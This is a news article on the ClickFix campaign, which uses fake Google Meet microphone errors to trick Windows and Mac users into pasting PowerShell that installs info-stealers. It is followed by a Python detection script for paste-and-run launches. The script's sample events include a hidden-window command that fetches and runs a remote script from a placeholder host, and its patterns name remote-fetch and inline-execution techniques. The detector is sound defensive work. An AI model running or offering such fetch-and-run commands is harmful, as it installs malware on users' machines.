The Google Meet error you last saw could be someone trying to hack your system

Windows and Mac users are being targeted by a new social engineering campaign, ClickFix, that uses fake Google Meet landing pages to plant info-stealing malware on victim systems.

According to research by the French cybersecurity company Sekoia, the campaign is a ClearFake variant, first observed in May 2024, that abuses PowerShell and the clipboard.

“This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems,” Sekoia said in the research.

Proofpoint, the cybersecurity company credited with naming the tactic, had reported in June that it is increasingly used by threat actors, including the initial access broker TA571, to deliver malware such as DarkGate, Matanbuchus, NetSupport, and various information stealers.

Faking Google Meet Conference errors

In the instances observed by Sekoia, threat actors were found using websites masquerading as the homepage of a Google Meet video conference. The sites displayed pop-up windows falsely indicating problems with the microphone and headset, Sekoia added.

The pop-up windows planted by the miscreants prompted users to fix the problems by pressing a combination of keys, which ultimately resulted in the victims copying the malware code, pasting it, and running it in the command prompt.

“Sekoia analysts successfully associated this cluster impersonating Google Meet with two cybercrime groups: ‘Slavic Nation Empire (SNE)’ and ‘Scamquerteo,’” Sekoia said. “These groups are sub-teams of the cryptocurrency scam teams ‘Marko Polo’ and ‘CryptoLove,’ respectively.”

Sekoia, in a blog post detailing the technical aspects of the campaign, listed all the domain names and IP addresses it observed in connection with the campaign cluster using the fake Google Meet web pages. It also shared samples of the URLs used to imitate legitimate Google Meet landing pages.

Increased activity with sophisticated payload delivery

Sekoia said the threat actors dropped different malware on Windows and macOS systems. Windows users were targeted with Stealc and Rhadamanthys, while Mac users were infected with the AMOS stealer, the blog noted.

The campaign seems to be on the rise, with several independent threat researchers reporting on its activities. Variations of the ClickFix campaign, including ClearFake and OneDrive Pastejacking, have been reported frequently in recent times.

“ClickFix is an emerging social engineering tactic first observed in 2024,” Sekoia said. “As of September 2024, several intrusion sets already adopted it to widely distribute malware through email phishing campaigns, compromised websites, and distribution infrastructures.”

While the tactic's momentum is a cause for concern, the significant user interaction these attacks need in order to succeed offers some hope. Aggressive enterprise training to identify and report these attempts should allow such threats to be handled effectively.
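Alongside training, the paste-and-run step described above can be hunted for in process-creation telemetry. The following is an added example, not code from Sekoia or CSO Online: it assumes events exported as dictionaries with hypothetical field names (`host`, `user`, `image`, `parent_image`, `command_line`), and its parent-process list and command-line indicators are illustrative heuristics rather than indicators from the research.

```python
import re

# Heuristics below are assumptions for this example, not indicators from Sekoia's report.
SHELLS = {"powershell.exe", "pwsh.exe"}
# Parents suggesting a user typed or pasted the command (Run dialog, command prompt).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
INDICATORS = {
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+[A-Za-z0-9+/=]{20,}"),
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+(?:hidden|h|1)\b"),
    "remote_fetch": re.compile(
        r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b"),
    "inline_exec": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
}

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(event):
    """Return the indicator names matched by one process-creation event."""
    if basename(event["image"]) not in SHELLS:
        return []
    if basename(event["parent_image"]) not in INTERACTIVE_PARENTS:
        return []
    return [n for n, rx in INDICATORS.items() if rx.search(event["command_line"])]

def find_paste_and_run(events, threshold=2):
    """Flag interactive PowerShell launches matching at least `threshold` indicators."""
    hits = []
    for ev in events:
        matched = score_event(ev)
        if len(matched) >= threshold:
            hits.append((ev["host"], ev["user"], matched))
    return hits

# Constructed sample events: hosts, users, paths, the URL and the base64 are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "WS-014", "user": "alice", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (irm https://example.invalid/fix.txt)"'},
    {"host": "SRV-002", "user": "SYSTEM", "image": PS, "parent_image": r"C:\Agent\agent.exe",
     "command_line": r"powershell.exe -NoProfile -w hidden -File C:\Scripts\inventory.ps1"},
    {"host": "WS-020", "user": "bob", "image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell -NoProfile -Command Get-Process"},
    {"host": "WS-031", "user": "carol", "image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell -w 1 -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="},
]

if __name__ == "__main__":
    for hit in find_paste_and_run(SAMPLE_EVENTS):
        print(hit)
```

Requiring two indicators plus an interactive parent keeps scheduled or agent-launched scripts out of the results; tune the threshold against your own baseline before alerting on it.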

